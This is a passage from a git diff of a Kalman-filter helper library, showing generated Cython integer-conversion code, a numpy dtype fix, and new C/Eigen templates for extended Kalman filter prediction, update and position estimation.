CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* CIntFromPy */ + static CYTHON_INLINE char __Pyx_PyInt_As_char(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const char neg_one = (char) -1, const_zero = (char) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(char) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(char, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (char) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(char, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(char) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 2 * PyLong_SHIFT)) { + return (char) (((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(char) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 3 * PyLong_SHIFT)) { + return (char) (((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(char) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 4 * PyLong_SHIFT)) { + return (char) (((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (char) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(char) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(char, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(char) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(char, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(char, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(char) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(char) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + return (char) ((((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(char) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + return (char) ((((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 4 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(char) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 4 * PyLong_SHIFT)) { + return (char) ((((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(char) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(char, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(char) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(char, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + char val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (char) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (char) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (char) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (char) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (char) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(char) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((char) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(char) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((char) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((char) 1) << (sizeof(char) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (char) -1; + } + } else { + char val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (char) -1; + val = __Pyx_PyInt_As_char(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to char"); + return (char) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to char"); + return (char) -1; +} + +/* FormatTypeName */ + #if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name_2); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__58)); + } + return name; +} +#endif + +/* CheckBinaryVersion */ + static int __Pyx_check_binary_version(void) { + char ctversion[5]; + int same=1, i, found_dot; + const char* rt_from_call = Py_GetVersion(); + PyOS_snprintf(ctversion, 5, "%d.%d", PY_MAJOR_VERSION, PY_MINOR_VERSION); + found_dot = 0; + for (i = 0; i < 4; i++) { + if (!ctversion[i]) { + same = (rt_from_call[i] < '0' || rt_from_call[i] > '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ + #if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/rednose/helpers/ekf_sym_pyx.so b/rednose/helpers/ekf_sym_pyx.so index e06e5a378..2deb7fbb2 100755 Binary files a/rednose/helpers/ekf_sym_pyx.so and b/rednose/helpers/ekf_sym_pyx.so differ diff --git a/rednose/helpers/feature_handler.py b/rednose/helpers/feature_handler.py index 473aefa56..165c9a4d0 100755 --- a/rednose/helpers/feature_handler.py +++ b/rednose/helpers/feature_handler.py @@ -98,7 +98,7 @@ class FeatureHandler(): real = np.isfinite(last_idxs) self.tracks[last_idxs[real].astype(int)] = self.tracks[real] - mask = np.ones(self.MAX_TRACKS, np.bool) + mask = np.ones(self.MAX_TRACKS, bool) mask[last_idxs[real].astype(int)] = 0 empty_idxs = np.arange(self.MAX_TRACKS)[mask] diff --git a/rednose/templates/compute_pos.c b/rednose/templates/compute_pos.c new file mode 100644 index 000000000..742c7d618 --- /dev/null +++ b/rednose/templates/compute_pos.c @@ -0,0 +1,52 @@ +#include +#include +#include + +typedef Eigen::Matrix R3M; +typedef Eigen::Matrix R1M; +typedef Eigen::Matrix O1M; +typedef Eigen::Matrix M3D; + +void gauss_newton(double *in_x, double *in_poses, double *in_img_positions) { + + double res[KDIM*2] = {0}; + double jac[KDIM*6] = {0}; + + O1M x(in_x); + O1M delta; + int counter = 0; + while ((delta.squaredNorm() > 0.0001 and counter < 30) or counter == 0){ + res_fun(in_x, in_poses, in_img_positions, res); + jac_fun(in_x, in_poses, in_img_positions, jac); + R1M E(res); R3M J(jac); + delta = (J.transpose()*J).inverse() * J.transpose() * E; + x = x - delta; + memcpy(in_x, x.data(), 3 * sizeof(double)); + counter = counter + 1; + } +} + + +void compute_pos(double *to_c, double *poses, double *img_positions, double *param, double *pos) { + param[0] = img_positions[KDIM*2-2]; + param[1] = img_positions[KDIM*2-1]; + param[2] = 0.1; + gauss_newton(param, poses, img_positions); + + Eigen::Quaterniond q; + q.w() = poses[KDIM*7-4]; + q.x() = poses[KDIM*7-3]; + q.y() = poses[KDIM*7-2]; + q.z() = poses[KDIM*7-1]; + M3D RC(to_c); + Eigen::Matrix3d R = q.normalized().toRotationMatrix(); + Eigen::Matrix3d rot = R * RC.transpose(); + + pos[0] = param[0]/param[2]; + pos[1] = param[1]/param[2]; + pos[2] = 1.0/param[2]; + O1M ecef_offset(poses + KDIM*7-7); + O1M ecef_output(pos); + ecef_output = rot*ecef_output + ecef_offset; + memcpy(pos, ecef_output.data(), 3 * sizeof(double)); +} diff --git a/rednose/templates/ekf_c.c b/rednose/templates/ekf_c.c new file mode 100644 index 000000000..3b4acdfe3 --- /dev/null +++ b/rednose/templates/ekf_c.c @@ -0,0 +1,123 @@ +#include +#include + +typedef Eigen::Matrix DDM; +typedef Eigen::Matrix EEM; +typedef Eigen::Matrix DEM; + +void predict(double *in_x, double *in_P, double *in_Q, double dt) { + typedef Eigen::Matrix RRM; + + double nx[DIM] = {0}; + double in_F[EDIM*EDIM] = {0}; + + // functions from sympy + f_fun(in_x, dt, nx); + F_fun(in_x, dt, in_F); + + + EEM F(in_F); + EEM P(in_P); + EEM Q(in_Q); + + RRM F_main = F.topLeftCorner(MEDIM, MEDIM); + P.topLeftCorner(MEDIM, MEDIM) = (F_main * P.topLeftCorner(MEDIM, MEDIM)) * F_main.transpose(); + P.topRightCorner(MEDIM, EDIM - MEDIM) = F_main * P.topRightCorner(MEDIM, EDIM - MEDIM); + P.bottomLeftCorner(EDIM - MEDIM, MEDIM) = P.bottomLeftCorner(EDIM - MEDIM, MEDIM) * F_main.transpose(); + + P = P + dt*Q; + + // copy out state + memcpy(in_x, nx, DIM * sizeof(double)); + memcpy(in_P, P.data(), EDIM * EDIM * sizeof(double)); +} + +// note: extra_args dim only correct when null space projecting +// otherwise 1 +template +void update(double *in_x, double *in_P, Hfun h_fun, Hfun H_fun, Hfun Hea_fun, double *in_z, double *in_R, double *in_ea, double MAHA_THRESHOLD) { + typedef Eigen::Matrix ZZM; + typedef Eigen::Matrix ZDM; + typedef Eigen::Matrix XEM; + //typedef Eigen::Matrix EZM; + typedef Eigen::Matrix X1M; + typedef Eigen::Matrix XXM; + + double in_hx[ZDIM] = {0}; + double in_H[ZDIM * DIM] = {0}; + double in_H_mod[EDIM * DIM] = {0}; + double delta_x[EDIM] = {0}; + double x_new[DIM] = {0}; + + + // state x, P + Eigen::Matrix z(in_z); + EEM P(in_P); + ZZM pre_R(in_R); + + // functions from sympy + h_fun(in_x, in_ea, in_hx); + H_fun(in_x, in_ea, in_H); + ZDM pre_H(in_H); + + // get y (y = z - hx) + Eigen::Matrix pre_y(in_hx); pre_y = z - pre_y; + X1M y; XXM H; XXM R; + if (Hea_fun){ + typedef Eigen::Matrix ZAM; + double in_Hea[ZDIM * EADIM] = {0}; + Hea_fun(in_x, in_ea, in_Hea); + ZAM Hea(in_Hea); + XXM A = Hea.transpose().fullPivLu().kernel(); + + + y = A.transpose() * pre_y; + H = A.transpose() * pre_H; + R = A.transpose() * pre_R * A; + } else { + y = pre_y; + H = pre_H; + R = pre_R; + } + // get modified H + H_mod_fun(in_x, in_H_mod); + DEM H_mod(in_H_mod); + XEM H_err = H * H_mod; + + // Do mahalobis distance test + if (MAHA_TEST){ + XXM a = (H_err * P * H_err.transpose() + R).inverse(); + double maha_dist = y.transpose() * a * y; + if (maha_dist > MAHA_THRESHOLD){ + R = 1.0e16 * R; + } + } + + // Outlier resilient weighting + double weight = 1;//(1.5)/(1 + y.squaredNorm()/R.sum()); + + // kalman gains and I_KH + XXM S = ((H_err * P) * H_err.transpose()) + R/weight; + XEM KT = S.fullPivLu().solve(H_err * P.transpose()); + //EZM K = KT.transpose(); TODO: WHY DOES THIS NOT COMPILE? + //EZM K = S.fullPivLu().solve(H_err * P.transpose()).transpose(); + //std::cout << "Here is the matrix rot:\n" << K << std::endl; + EEM I_KH = Eigen::Matrix::Identity() - (KT.transpose() * H_err); + + // update state by injecting dx + Eigen::Matrix dx(delta_x); + dx = (KT.transpose() * y); + memcpy(delta_x, dx.data(), EDIM * sizeof(double)); + err_fun(in_x, delta_x, x_new); + Eigen::Matrix x(x_new); + + // update cov + P = ((I_KH * P) * I_KH.transpose()) + ((KT.transpose() * R) * KT); + + // copy out state + memcpy(in_x, x.data(), DIM * sizeof(double)); + memcpy(in_P, P.data(), EDIM * EDIM * sizeof(double)); + memcpy(in_z, y.data(), y.rows() * sizeof(double)); +} + + diff --git a/rednose/templates/feature_handler.c b/rednose/templates/feature_handler.c new file mode 100644 index 000000000..9c580c2ea --- /dev/null 